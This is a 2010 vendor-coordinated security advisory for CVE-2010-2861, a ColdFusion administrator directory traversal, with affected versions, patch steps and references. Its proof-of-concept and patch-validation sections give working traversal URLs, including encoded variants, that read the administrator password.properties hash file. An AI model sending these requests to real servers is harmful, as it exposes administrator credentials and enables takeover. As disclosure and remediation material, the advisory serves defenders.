PR10-07 - Unauthenticated File Retrieval (traversal) within ColdFusion administration console

Vulnerability found:

17 April 2010

Vendor informed:

19 April 2010

Credits:

Richard Brain of ProCheckUp Ltd (www.procheckup.com) Many Thanks to Adrian Pastor, and Raf Los of HP for increasing community awarness of this flaw.

Description:

Adobe ColdFusion is a easy to use and very widely adopted programming language, ProCheckUp has discovered that the ColdFusion admin console (and various programs within) are vulnerable to multiple directory traversal attacks related to a input parameter. No authentication is needed; all that is needed is that the admin console is accessible to the Internet.
Notes: Tested on ColdFusion enterprise versions 6 to version 8.01 running on Windows XP, and Windows 2003 R2 SP2 server and mapped to IIS 6.
Defaults were chosen with "server contained installation" "like the earlier versions", and all subcomponents.
ColdFusion 9 provides an additional layer of filtering to prevent common attacks, preventing the below attack from working. ProCheckUp recommends however

ColdFusion 9 users to apply the ColdFusion 9 patches as ProCheckUp have found the filtering can be bypassed.

Versions tested and found vulnerable
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4

Not vulnerable
ColdFusion 5 base patches

Consequences:
Arbitrary files can be retrieved from the target server to gain admin rights, no authentication is required to exploit this vulnerability.

Proof of concept:

1) Multiple administration programs are vulnerable to directory traversal (For brevity only a few programs are shown), due to the locale variable not sufficiently filtering submitted input. This is a generic Windows attack.

The following examples the cfm extension is mapped to an Apache, IIS etc. web server.
http://target-domain.foo/CFIDE/administrator/settings/mappings.cfm?locale=..\..\..\..\..\..\..\..\windows\win.ini%00en

http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\windows\win.ini%00en

The following examples directly accessed over port 8500.
http://target-domain.foo:8500/CFIDE/administrator/datasources/index.cfm?locale=..\..\..\..\..\..\..\..\windows\win.ini%00en

http://target-domain.foo:8500/CFIDE/administrator/j2eepackaging/editarchive.cfm?locale=..\..\..\..\..\..\..\..\..\windows\win.ini%00en

2) Single server configuration ColdFusion administrator password retrieval.
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en

ColdFusion 7 admin password hash retrieval - easily decoded using a SHA1 rainbow table
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en

ColdFusion 8 admin password hash retrieval - easily decoded using a SHA1 rainbow table
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

3) Universal multiserver configuration (ColdFusion + JRun) ColdFusion administrator password file retrieval.

ColdFusion versions 6,7 AND 8 admin password hash retrieval. Versions 7 & 8 are easily decoded using a SHA1 rainbow table.
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en

How to fix:

Apply patches as described below, or restrict access to /CFIDE/administrator/ by IP address or other similar controls. ProCheckUp STRONGLY recommends that access to the entire /CFIDE/ directory is restricted, or at the bare minimum /CFIDE/adminapi/ /CFIDE/administrator/ /CFIDE/componentutils/ /CFIDE/wizards/ /CFIDE/install.cfm /CFIDE/probe.cfm due to the large number of programs which use the l10n program.

Procheckup also recommends the following lockdown guide is read http://www.adobe.com/products/coldfusion/whitepapers/pdf/91025512_cf9_lockdownguide_wp_ue.pdf

See http://www.adobe.com/support/security/bulletins/apsb10-18.html

ColdFusion 9
1. Download CFIDE-9.zip from Adobe.
2. Make a backup of the {CFIDE-Home}\administrator\cftags\l10n.cfm and {CFIDE-Home}\administrator\cftags\l10n_testing.cfm files.
3. Extract the files in CFIDE-9.zip to the web root directory that consists of CFIDE folder. The Server Settings > Mappings page in the ColdFusion
Administrator shows the location of the CFIDE directory in the value for the CFIDE mapping.
4. Repeat steps 2 and 3 if there are other CFIDE directories identified in any other instances.
5. Restart all the ColdFusion instances.

ColdFusion 8.0.1
1. Download CFIDE-801.zip from Adobe.
2. Make a backup of the {CFIDE-Home}\administrator\cftags\l10n.cfm and {CFIDE-Home}\administrator\cftags\l10n_testing.cfm files.
3. Extract the files in CFIDE-801.zip to the web root directory that consists of CFIDE folder. The Server Settings > Mappings page in the ColdFusion
Administrator shows the location of the CFIDE directory in the value for the CFIDE mapping.
4. Repeat steps 2 and 3 if there are other CFIDE directories identified in any other instances.
5. Restart all the ColdFusion instances.

ColdFusion 8.0
1. Download CFIDE-8.zip from Adobe.
2. Make a backup of the {CFIDE-Home}\administrator\cftags\l10n.cfm and {CFIDE-Home}\administrator\cftags\l10n_testing.cfm files.
3. Extract the files in CFIDE-8.zip to the web root directory that consists of CFIDE folder. The Server Settings > Mappings page in the ColdFusion
Administrator shows the location of the CFIDE directory in the value for the CFIDE mapping.
4. Repeat steps 2 and 3 if there are other CFIDE directories identified in any other instances.
5. Restart all the ColdFusion instances.


Note The following working ColdFusion 8 exploit variations were used - to validate the veracity of the patch

http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../..\ColdFusion8\lib\password.properties%00en

http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..\ColdFusion8\lib\password.properties%00en

http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f..\ColdFusion8\lib\password.properties%00en

http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\/..\/..\/..\/..\/..\/..\/..\ColdFusion8\lib\password.properties%00en

http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..//..//..//..//..//..//..//..\ColdFusion8\lib\password.properties%00en

http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=.././.././.././.././.././.././.././..\ColdFusion8\lib\password.properties%00en

References:

CVE-2010-2861
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2861

APSB10-18
http://www.adobe.com/support/security/bulletins/apsb10-18.html

Legal:

Copyright 2010 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is
Not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.